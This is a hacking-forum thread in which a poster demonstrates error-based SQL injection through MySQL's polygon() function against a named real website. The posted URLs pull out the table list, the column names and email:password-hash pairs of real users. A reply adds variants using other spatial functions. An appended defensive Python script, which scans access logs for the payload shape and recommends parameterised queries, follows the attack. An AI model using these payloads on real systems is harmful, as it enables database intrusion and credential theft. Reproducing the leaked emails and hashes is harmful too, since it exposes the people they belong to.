nacks Posted January 3, 2015

This method is based on the function polygon(). In a nutshell, this function constructs a geometry collection. The vuln thing about it is that it can only work with the function point(). For example:

SELECT polygon(point(53,12));

And the output is a bunch of ???'s. Not really exciting, eh?

For those who know a bit of geometry, it goes like point(x,y). Now look what happens when we don't use point():

SELECT polygon(53,12);
Error 1367 (22007): Illegal non geometric '53' value found during parsing

We get an error on our x argument, 53. So let's think a bit. If the error returns our string input as a string output, what would happen if we try to run a query?

SELECT polygon((select*from(select*from(select@@version)f)x));
Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing

Boom! 5.5.38-35.2

Now let's try that on a real site. Conditions: mysql_error on.

Let's get the version:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))
5.1.73-log

Nice, but can we extract more? Hell yeah. We will be using this to get tables:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmessages,pernodnews,pernodpolls,pernodtopics,pernoduser

I'm interested in the table pernoduser, let's get columns:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))
pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted

And dump the table:
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))
and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.uk:795b087b2ceb3482dc9956eb8f126ea3

And we get the data. To overpower the 'cut results', we can just add a condition at the end, " where email>last-email ".

Hope you learned something!

Source: HF + Frostyhacks
botulnr2 Posted January 3, 2015 (edited)

Criminal method :) I think there are more functions like this in MySQL that parse the subquery and then throw it out in the error. It doesn't work on 5.6.*; I think it works on lower versions, I think...

Thanks for sharing.

The same shit with MULTIPOLYGON((select*from(select*from(select@@version)y)x)), MULTILINESTRING, GEOMETRYCOLLECTION.

Edited January 3, 2015 by botulnr2
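From the defender's side, the thing both posts above have in common is a recognisable request shape: a MySQL spatial constructor (polygon, and the MULTIPOLYGON / MULTILINESTRING / GEOMETRYCOLLECTION variants from the reply) whose argument list opens with a parenthesised SELECT. The following script is an added example, not code from either poster: it scans access-log lines for that shape in query-string parameters, after URL-decoding and stripping inline comments, so it can be run over existing logs to find out whether an application that still echoes mysql_error() output has been probed this way. The log lines, client addresses and the /item.php path are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# MySQL spatial constructors named in the thread (first post and the reply).
SPATIAL_FUNCS = ("polygon", "multipolygon", "multilinestring", "geometrycollection")

# Spatial constructor followed by a parenthesised SELECT, i.e. the
# `polygon((select ...` shape the post uses to push a subquery into error 1367.
_PATTERN = re.compile(
    r"\b(" + "|".join(SPATIAL_FUNCS) + r")\s*\(\s*\(\s*select\b",
    re.IGNORECASE,
)

# Combined-log request line: extract the request target.
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize(value):
    """URL-decode twice (catches double-encoded payloads), drop /* */ comments,
    and collapse whitespace so spacing tricks do not defeat the pattern."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def find_spatial_injection(url):
    """Return (parameter, function) pairs for query parameters that match."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = _PATTERN.search(normalize(value))
        if m:
            hits.append((name, m.group(1).lower()))
    return hits


def scan_access_log(lines):
    """Scan combined-format log lines; return one finding per matching parameter."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = _REQUEST.search(line)
        if not m:
            continue
        for param, func in find_spatial_injection(m.group(1)):
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "param": param,
                "func": func,
            })
    return findings


# Constructed sample log (not real traffic). Spaces in the payloads are %20-encoded,
# as a web server would record them.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jan/2015:11:58:01 +0000] "GET /item.php?id=42 HTTP/1.1" 200 1834',
    '203.0.113.5 - - [03/Jan/2015:12:00:00 +0000] "GET /item.php?id=polygon((select*from(select*from(select@@version)f)x)) HTTP/1.1" 500 512',
    '198.51.100.7 - - [03/Jan/2015:12:01:14 +0000] "GET /search.php?q=polygon+area HTTP/1.1" 200 2210',
    '203.0.113.5 - - [03/Jan/2015:12:02:37 +0000] "GET /item.php?id=MULTIPOLYGON((select*from(select*from(select@@version)y)x)) HTTP/1.1" 500 520',
    '203.0.113.5 - - [03/Jan/2015:12:03:09 +0000] "GET /item.php?id=geometrycollection(/**/(select*from(select*from(select%20user())f)x)) HTTP/1.1" 500 518',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} param={f['param']} func={f['func']}")
```

The benign "polygon area" search and the plain numeric id are not flagged; the three probes are, including the one padded with an inline comment. Detection is a stopgap: the lasting fix on the application side is a parameterised query for the id value and an error handler that logs mysql_error() text instead of returning it to the client, since the whole technique depends on the server echoing the failed parse back.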